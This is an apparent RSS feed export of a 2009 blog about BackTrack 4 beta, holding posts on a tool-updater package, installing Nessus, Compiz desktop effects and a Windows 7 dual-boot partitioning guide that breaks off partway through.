tar -zxvf Parallel-ForkManager-0.7.5.tar.gz<br />
cd Parallel-ForkManager-0.7.5<br />
perl Makefile.PL<br />
make<br />
make install<br />
cd \<br />
wget http://search.cpan.org/CPAN/authors/id/T/TU/TURNSTEP/Net-SSH-Perl-1.34.tar.gz<br />
tar -zxvf Net-SSH-Perl-1.34.tar.gz<br />
cd Net-SSH-Perl-1.34<br />
perl Makefile.PL<br />
make<br />
make install<strong><br />
</strong></p></blockquote>
<blockquote><p><strong><br />
</strong></p></blockquote>
<p><strong><br />
</strong></p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/230/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/230/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/230/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/230/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/230/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/230/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/230/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/230/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/230/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/230/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/230/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/230/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/230/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/230/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=230&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2009/03/06/backtrack-4-beta-menu-bugs-fix-servicesmysqltoolset/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>
	</item>
		<item>
		<title>Back&#124;Track 4 Tools Auto-Updater(Nifty GUI Tool)</title>
		<link>http://wifi0wn.wordpress.com/2009/03/06/backtrack-4-tools-auto-updaternifty-gui-tool/</link>
		<comments>http://wifi0wn.wordpress.com/2009/03/06/backtrack-4-tools-auto-updaternifty-gui-tool/#comments</comments>
		<pubDate>Fri, 06 Mar 2009 06:50:35 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>
		<category><![CDATA[automatic bt4 tool update]]></category>
		<category><![CDATA[backtrack 4 tools updater]]></category>
		<category><![CDATA[bt4 tools update]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/2009/03/06/228/</guid>
		<description><![CDATA[Hello to all the members &#38; visitor to this forum.I have created a debian package for installing/updating the top-notch tools of BackTrack distro to make you stay latest one. this tool has been created in shell programming as back-end &#38; I have used the light one GUI tool zenity to support &#38; looks thing good.this [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=228&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hello to all the members &amp; visitor to this forum.I have created a debian package for installing/updating the top-notch tools of BackTrack distro to make you stay latest one.<br />
this tool has been created in shell programming as back-end &amp; I have used the light one GUI tool zenity to support &amp; looks thing good.this tool will install the bt4_tu file to /usr/bin so you can invoke it from anywhere on shell &amp; it will create one folder in /pnetest/BackTrack Tool Updater having shell file,HELP,INSTALL,ICON file.kindly pay a look to both INSTALL &amp; HELP File.<br />
for working this you need a working Internet connection &amp; zenity(Already with BT4).<br />
this is fully automatic tool &amp; need no user intervention.so feel free &amp; update your security tools on day to day basis.here is list of tools which will be installed/updated.</p>
<p>1.Aircrack-ng<br />
2.Metasploit Framework<br />
3.Milw0rm Database<br />
4.Nmap<br />
5.Fast-Track<br />
6.Nikto<br />
7.Inguma<br />
8.W3af<br />
9.Nessus-Plugins(register yourself for getting home-feed first &amp; using for using this you need to have nessus already installed in system)</p>
<p>10.Snort rules(Only version 2.8 support yet &amp; downloading can be done with the interval of 15 mins after previous download)</p>
<p>11.All(All-In-One Tools Silent Updation)</p>
<p>The attach file is debian package.</p>
<p><a href="http://www.mediafire.com/?9zgzftsmkxc" target="_blank"><strong>DOWNLOAD HERE</strong></a></p>
<p>Install it using</p>
<p>bt~#dpkg -i bt4_tool_updater1.0.deb</p>
<p>remove using</p>
<p>bt~#dpkg -r bt4-tu</p>
<p style="text-align:center;"><img class="aligncenter" title="new" src="http://img18.imageshack.us/img18/9523/snapshot4.png" alt="" width="607" height="303" /></p>
<p style="text-align:center;">
<p style="text-align:center;"><img class="aligncenter" title="2" src="http://img12.imageshack.us/img12/6254/downloada.jpg" alt="" width="579" height="288" /></p>
<p style="text-align:center;"><img class="aligncenter" title="3" src="http://img27.imageshack.us/img27/2639/installing.jpg" alt="" width="584" height="291" /></p>
<p style="text-align:center;"><img class="aligncenter" title="4" src="http://img8.imageshack.us/img8/7124/installed.jpg" alt="" width="613" height="306" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/228/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=228&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2009/03/06/backtrack-4-tools-auto-updaternifty-gui-tool/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>

		<media:content url="http://img18.imageshack.us/img18/9523/snapshot4.png" medium="image">
			<media:title type="html">new</media:title>
		</media:content>

		<media:content url="http://img12.imageshack.us/img12/6254/downloada.jpg" medium="image">
			<media:title type="html">2</media:title>
		</media:content>

		<media:content url="http://img27.imageshack.us/img27/2639/installing.jpg" medium="image">
			<media:title type="html">3</media:title>
		</media:content>

		<media:content url="http://img8.imageshack.us/img8/7124/installed.jpg" medium="image">
			<media:title type="html">4</media:title>
		</media:content>
	</item>
		<item>
		<title>Nessus 3.2.1 on Back&#124;track 4 Beta</title>
		<link>http://wifi0wn.wordpress.com/2009/02/12/nessus-321-on-backtrack-4-beta/</link>
		<comments>http://wifi0wn.wordpress.com/2009/02/12/nessus-321-on-backtrack-4-beta/#comments</comments>
		<pubDate>Thu, 12 Feb 2009 20:32:57 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Vulnerability Assessment]]></category>
		<category><![CDATA[nessu 3.2.1]]></category>
		<category><![CDATA[nessus]]></category>
		<category><![CDATA[nessus backtrack]]></category>
		<category><![CDATA[nessus backtrack 4]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/2009/02/12/nessus-321-on-backtrack-4-beta/</guid>
		<description><![CDATA[Installing nessus on backtrack 4 beta &#38; to configure it also along with nessus client<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=213&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hello all the visitors.here I am going to tell how to install Nessus on Back|track 4 beta.don&#8217;t use apt-get install nessus as first I tried with apt-get but there was very older version of Nessus in respositories.something 2.x.quite useless isn&#8217;t it.so lets install the latest one.<br />
First download these packages</p>
<p><a href="http://downloads.nessus.org/nessus3dl.php?file=Nessus-3.2.1-ubuntu804_i386.deb&amp;licence_accept=yes&amp;t=29405df1e6e5014292802fe878e9a1b0" target="_blank">Nessus-3.2.1-ubuntu804_i386.deb</a></p>
<p><a href="http://downloads.nessus.org/nessus3dl.php?file=NessusClient-3.2.1-debian4_i386.deb&amp;licence_accept=yes&amp;t=29405df1e6e5014292802fe878e9a1b0" target="_blank">NessusClient-3.2.1-debian4_i386.deb</a></p>
<p>(I choose this debian package because NessusClient-3.2.1.1-ubuntu804.i386.deb was missing some of dependencies and was not installing correctly.instead the debian package worked like a charm and it produces no error at all.</p>
<p>Next register your copy to get plugins update using homefeed and please provide the real mail ID as they will send you the activation key for homefeed.</p>
<p><a href="http://www.nessus.org/plugins/index.php?view=register" target="_blank">Regsiter Here</a></p>
<p>Click accept and enter a valid working email ID.</p>
<p>now we start installing the packages.</p>
<p>root@ThUndErbOLt:~#dpkg -i Nessus-3.2.1-ubuntu804_i386.deb</p>
<p>now configure the certificate &amp; admin user for nessus</p>
<p>root@ThUndErbOLt:~#/opt/nessus/sbin/nessus-mkcert  (this is neccessary to communicate between nessus client to nessus daemon/remote host)</p>
<p>CA certificate life time in days [1460]:<br />
Server certificate life time in days [365]:<br />
Your country (two letter code) [FR]:IN<br />
Your state or province name [none]: Karnataka<br />
Your location (e.g. town) [Paris]: Bangalore</p>
<p>it should show the message</p>
<p>Congratulations. Your server certificate was properly created.</p>
<p>hit enter to come out</p>
<p>root@ThUndErbOLt:~#/opt/nessus/sbin/nessus-adduser</p>
<p>enter information about the user.</p>
<p>Login</p>
<p>Authentication (Pass/Cert)</p>
<p>Password:</p>
<p>confirm password:</p>
<p>after configuring the parameters it ask for rule-set.we have configured the admin user having full permissions.if we wants to limit and want to add certain users then we can use rule-set here.</p>
<p>For configuring ruleset please refer to nessus-adduser( 8 ) man page for the rules syntax as it limit the use of nessus.</p>
<p>press ctrl + d</p>
<p>it asks for confirmation.choose y</p>
<p>now start Nessus daemon by using</p>
<p>root@ThUndErbOLt:~# /etc/init.d/nessusd start</p>
<p>$Starting Nessus : .</p>
<p>confirm that its running using</p>
<p>root@ThUndErbOLt:~# netstat -ant|grep 1241<br />
tcp                      0                        0 0.0.0.0:1241            0.0.0.0:*               LISTEN<br />
tcp6                   0                        0 :::1241                          :::*                            LISTEN</p>
<p>now Install NessusClient(the GUI Frontend to use nessusd)</p>
<p>root@ThUndErbOLt:~# dpkg -i NessusClient-3.2.1-debian4_i386.deb</p>
<p>now register the plugin feed for updating nessus</p>
<p>root@ThUndErbOLt:~#/opt/nessus/bin/nessus-fetch &#8211;register XXXX-XXXX-XXXX-XXXX(replace X with your keys)</p>
<p>Your activation code has been registered properly &#8211; thank you.<br />
Now fetching the newest plugin set from plugins.nessus.org&#8230;<br />
now it will download the plugins and will purge them into database.if you don&#8217;t wan&#8217;t to do this now.press ctrl + c to cancel it.later you can download it using</p>
<p>root@ThUndErbOLt:~#/opt/nessus/sbin/nessus-update-plugins</p>
<p>run the scan using NessusClient</p>
<p>backtrack menu-&gt;Internet-&gt;NessusClient</p>
<p>click on + icon</p>
<p>by default selection radiobox is single host</p>
<p>type Host Name localhost &amp; hit save</p>
<p>select the localhost &amp; press connect</p>
<p>from connect option box choose edit</p>
<p>set the Login &amp; Password which we created earlier using nessus-adduser</p>
<p>hit Save</p>
<p>select localhost &amp; hit connect</p>
<p>first time it asks for logging into nessus server.hit yes</p>
<p>now you can customize the default scan/microsoft scan policy and can scan.that&#8217;s it!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/213/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/213/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/213/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/213/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/213/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/213/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/213/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/213/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/213/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/213/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/213/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/213/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/213/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/213/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=213&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2009/02/12/nessus-321-on-backtrack-4-beta/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>
	</item>
		<item>
		<title>Compiz Fusion on BT 4 beta(cube/wobbly/transparent)</title>
		<link>http://wifi0wn.wordpress.com/2009/02/11/compiz-fusion-on-bt-4-betacubewobblytransparent/</link>
		<comments>http://wifi0wn.wordpress.com/2009/02/11/compiz-fusion-on-bt-4-betacubewobblytransparent/#comments</comments>
		<pubDate>Wed, 11 Feb 2009 23:56:05 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=211</guid>
		<description><![CDATA[First install the display driver for your card e.g. radion/nvidia.in my case I am using Nvidia 9200 M GS Chipset.so here is link to download.also check the supported chipset models. please refer to this page for Nvidia chipset &#38; to know which driver is for your chipset http://www.nvidia.com/Download/index.aspx?lang=en-us In my case of Nvidia 9 Series [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=211&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>First install the display driver for your card e.g. radion/<a href="void(0);" target="_blank">nvidia.in</a> my case I am using Nvidia 9200 M GS Chipset.so here is link to download.also check the supported chipset models.</p>
<p>please refer to this page for Nvidia chipset &amp; to know which driver is for your chipset</p>
<p>http://www.nvidia.com/Download/index.aspx?lang=en-us</p>
<p>In my case of Nvidia 9 Series Mobile chipset I am using</p>
<p>wget <a href="void(0);" target="_blank">http://us.download.nvidia.com/XFree86/Linux-x86/180.22/NVIDIA-Linux-x86-180.22-pkg1.run</a></p>
<p>for installing it,its neccessary that you logout from KDE X</p>
<p>root@ThUnDeRbOLt:~#install NVIDIA-Linux-x86-180.22-pkg1.run nvidia<br />
root@ThUnDeRbOLt:~#./nvidia</p>
<p>it will autoconfigure options according to kernel.if all went well you will see success message else note the error messages as it may be because of installing wrong drivers for chipset or mismatch in kernel version.</p>
<p>next<br />
root@ThUnDeRbOLt:~#apt-get install compiz compiz-fusion-plugins-extra compiz-fusion-plugins-unsupported emerald simple-ccsm fusion-icon</p>
<p>For Emerald windows decorator download:<br />
root@ThUnDeRbOLt:~#wget http://fr.archive.ubuntu.com/ubuntu/pool/universe/e/emerald/libemeraldengine0_0.7.2-0ubuntu2_i386.deb<br />
root@ThUnDeRbOLt:~#wget http://fr.archive.ubuntu.com/ubuntu/pool/universe/e/emerald/emerald_0.7.2-0ubuntu2_i386.deb<br />
root@ThUnDeRbOLt:~#dpkg -i libemeraldengine0_0.7.2-0ubuntu2_i386.deb<br />
root@ThUnDeRbOLt:~#dpkg -i emerald_0.7.2-0ubuntu2_i386.deb</p>
<p>Upgrade the Emerald themes using<br />
root@ThUnDeRbOLt:~#svn ls https://svn.generation.no/emerald-themes<br />
This will download and install the security key needed later to install these themes. When it asks, accept the certificate permanently.</p>
<p>More themes can be found <a href="http://compiz-themes.org/index.php?xcontentmode=103&amp;PHPSESSID=49418da949f214c47bdd50bd8ecf65ea">here</a>.Download and import in emerald theme manager</p>
<p>Invoke the compiz-fusion icon through backtrack menu-&gt;system-&gt;compiz fusion</p>
<p>right click on compiz fusion icon and choose reload window manager</p>
<p>some of effects you would like to play with<br />
<strong>Cube</strong><br />
For cube its neccessary to have minimum 4 desktop.so first we set it<br />
go to backtrack menu-&gt;system-&gt;settings-&gt;desktop-&gt;multiple desktops<br />
set here 4 desktop at least</p>
<p>now right click on the compiz fusion icon and choose setting manager<br />
choose genral options<br />
select desktop size tab<br />
move slider Horizontal Virtual Size to 4(Number of desktop you want to see)<br />
press back to go back</p>
<p>now from effect choose desktop cube &amp; Rotate cube<br />
configure zoom setting in rotate cube-&gt;genral tab set zoom to 0.1827(play with this setting)</p>
<p>now when you can use this effect by holding ctrl+alt  &amp; left mouse button or by simply pressing middle mouse button in the center of desktop.</p>
<p><strong>Wobbly windows</strong><br />
click on this and enable it and goto genral tab &amp; set friction to 2.1926(play with this setting)</p>
<p><strong>enable 3D Windows</strong><br />
<strong>enable Animations</strong></p>
<p>If you want cube reflection &amp; deformation then select it as it will present cube in deform one.</p>
<p>cube atlantis will fill fishes etc in the depth of cube.the topmost part.see them playing.<br />
goto cube atlantis water/ground tab &amp; clear the checkbox render water wireframe</p>
<p>Transparency<br />
goto desktop cube-&gt;transparent cube tab and adjust the &#8220;opacity during rotation&#8221; slider to 85.0000(set according to your wish)</p>
<p>select skydome &amp; cube caps(upper cube caps)for desktop<br />
goto desktop cube-&gt;appearance tab select image file<br />
goto desktop cube-&gt;appearance tab checkbox select skydome option &amp; choose image</p>
<p>now you have seen a lot of tweaks.have a beautiful desktop ahead.</p>
<p style="text-align:center;"><img class="aligncenter size-full wp-image-200" title="compiz-effect1" src="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect1.png?w=450&#038;h=281" alt="compiz-effect1" width="450" height="281" /><strong>Water effect on backtrack 4 beta</strong></p>
<p style="text-align:center;"><img class="aligncenter size-full wp-image-201" title="compiz-effect2" src="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect2.png?w=450&#038;h=281" alt="compiz-effect2" width="450" height="281" /><strong>Fire effect on Back|Track 4 Beta</strong></p>
<p style="text-align:center;"><img class="aligncenter size-full wp-image-203" title="compiz-effect3" src="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect3.png?w=450&#038;h=281" alt="compiz-effect3" width="450" height="281" /><strong>Some Color Firy effect on BT4</strong></p>
<p style="text-align:center;"><strong><img class="aligncenter size-full wp-image-204" title="compiz-effect4" src="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect4.png?w=450&#038;h=281" alt="compiz-effect4" width="450" height="281" />Blur effect on BT4 Beta</strong></p>
<p style="text-align:center;"><strong><img class="aligncenter size-full wp-image-205" title="compiz-effect5" src="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect5.png?w=450&#038;h=281" alt="compiz-effect5" width="450" height="281" />Cube Relection &amp; deformation effect in BackTrack 4 Beta</strong></p>
<p style="text-align:center;"><strong><img class="aligncenter size-full wp-image-206" title="compiz-effect6" src="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect6.png?w=450&#038;h=281" alt="compiz-effect6" width="450" height="281" />Rotating 3D Cube in Back|Track 4 Beta</strong></p>
<p style="text-align:center;"><strong><img class="aligncenter size-full wp-image-207" title="compiz-effect7" src="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect7.png?w=450&#038;h=281" alt="compiz-effect7" width="450" height="281" />3D Cube with Transparent cube atlantis(fishes inside cube)</strong></p>
<p style="text-align:center;"><strong><img class="aligncenter size-full wp-image-208" title="compiz-effect8" src="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect8.png?w=450&#038;h=281" alt="compiz-effect8" width="450" height="281" />Expo Effect of multiple desktops in BT 4</strong></p>
<p style="text-align:center;"><strong><img class="aligncenter size-full wp-image-209" title="compiz-effect9" src="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect9.png?w=450&#038;h=281" alt="compiz-effect9" width="450" height="281" />cube effect after setting cube caps &amp; skydome</strong></p>
<p style="text-align:left;">For Enabling emerald theme manager<br />
Right click on fusion icon<br />
select window decorator as emerald<br />
select window manager as compiz<br />
choose the themes from Emerald Theme Manager<br />
you should have pretty desktop now in front of you.</p>
<p style="text-align:center;"><img class="aligncenter size-full wp-image-223" title="compiz-effect10" src="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect10.png?w=450&#038;h=281" alt="compiz-effect10" width="450" height="281" />Emerald Theme on B|T 4</p>
<p style="text-align:center;"><img class="aligncenter size-full wp-image-224" title="compiz-effect11" src="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect11.png?w=450&#038;h=281" alt="compiz-effect11" width="450" height="281" />6 desktop in rotating cube with Emerald theme</p>
<p style="text-align:center;"><strong><br />
</strong></p>
<p style="text-align:center;"><strong></strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/211/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/211/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/211/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/211/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/211/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/211/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/211/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/211/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/211/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/211/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/211/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/211/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/211/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/211/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=211&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2009/02/11/compiz-fusion-on-bt-4-betacubewobblytransparent/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect1.png" medium="image">
			<media:title type="html">compiz-effect1</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect2.png" medium="image">
			<media:title type="html">compiz-effect2</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect3.png" medium="image">
			<media:title type="html">compiz-effect3</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect4.png" medium="image">
			<media:title type="html">compiz-effect4</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect5.png" medium="image">
			<media:title type="html">compiz-effect5</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect6.png" medium="image">
			<media:title type="html">compiz-effect6</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect7.png" medium="image">
			<media:title type="html">compiz-effect7</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect8.png" medium="image">
			<media:title type="html">compiz-effect8</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect9.png" medium="image">
			<media:title type="html">compiz-effect9</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect10.png" medium="image">
			<media:title type="html">compiz-effect10</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/compiz-effect11.png" medium="image">
			<media:title type="html">compiz-effect11</media:title>
		</media:content>
	</item>
		<item>
		<title>Back&#124;Track 4 beta &amp; Windows 7 Ultimate Dual Boot</title>
		<link>http://wifi0wn.wordpress.com/2009/02/11/backtrack-4-beta-windows-7-ultimate-dual-boot/</link>
		<comments>http://wifi0wn.wordpress.com/2009/02/11/backtrack-4-beta-windows-7-ultimate-dual-boot/#comments</comments>
		<pubDate>Wed, 11 Feb 2009 15:33:27 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=189</guid>
		<description><![CDATA[Hello to all the visitor of this blog.time to make some fun with back&#124;track 4 beta along with windows 7 ultimate beta.the fun part is both of the distro&#8217;s are in beta state &#38; will updated time to time untill final release.first install windows 7 ultimate and I assume you know how to do that(the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=189&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hello to all the visitor of this blog.time to make some fun with back|track 4 beta along with windows 7 ultimate beta.the fun part is both of the distro&#8217;s are in beta state &amp; will updated time to time untill final release.first install windows 7 ultimate and I assume you know how to do that(the most easiest thing is world I assume).here is what partition scheme I used.change it accordingly to your HDD partitions.also I assume you have make 3 extra partitions from the empty space from HDD using 3rd party tool like paragon partition manager as fdisk options wipe the partition.</p>
<p>Boot through BT4 ISO and see the mount point using</p>
<p>root@ThUnDerBolT:~#nano /etc/fstab</p>
<p>here is how my partition scheme looks like</p>
<p><img class="aligncenter size-full wp-image-191" title="snapshot4" src="http://wifi0wn.files.wordpress.com/2009/02/snapshot4.png?w=450&#038;h=281" alt="snapshot4" width="450" height="281" /></p>
<p>Note down the partition scheme of your HDD as it will be use for later reference</p>
<p>now back to terminal</p>
<p>unmount all the NTFS &amp; EXT,reiserfs File System</p>
<p>root@ThUnDerBolT:~#umount /dev/sda1</p>
<p>root@ThUnDerBolT:~#umount /dev/sda2</p>
<p>root@ThUnDerBolT:~#umount /dev/sda3</p>
<p>root@ThUnDerBolT:~#umount /dev/sda5</p>
<p>root@ThUnDerBolT:~#umount /dev/sda6</p>
<p>now fdisk the sda harddisk</p>
<p>root@ThUnDerBolT:~#fdisk /dev/sda</p>
<p>Here is how my hard-disk partition scheme is</p>
<p><img class="aligncenter size-full wp-image-192" title="snapshot5" src="http://wifi0wn.files.wordpress.com/2009/02/snapshot5.png?w=450&#038;h=281" alt="snapshot5" width="450" height="281" />Please note down the linux partions start cylinder &amp; last cylinder.In my case its</p>
<p>/dev/sda5     29561     30325     83    Linux</p>
<p>/dev/sda6     30326    30334     83     Linux</p>
<p>/dev/sda7     30335    30401     82     Linux swap / Solaris</p>
<p>now delete the Linux partitions carefully.use commands</p>
<p>d</p>
<p>7</p>
<p>d</p>
<p>6</p>
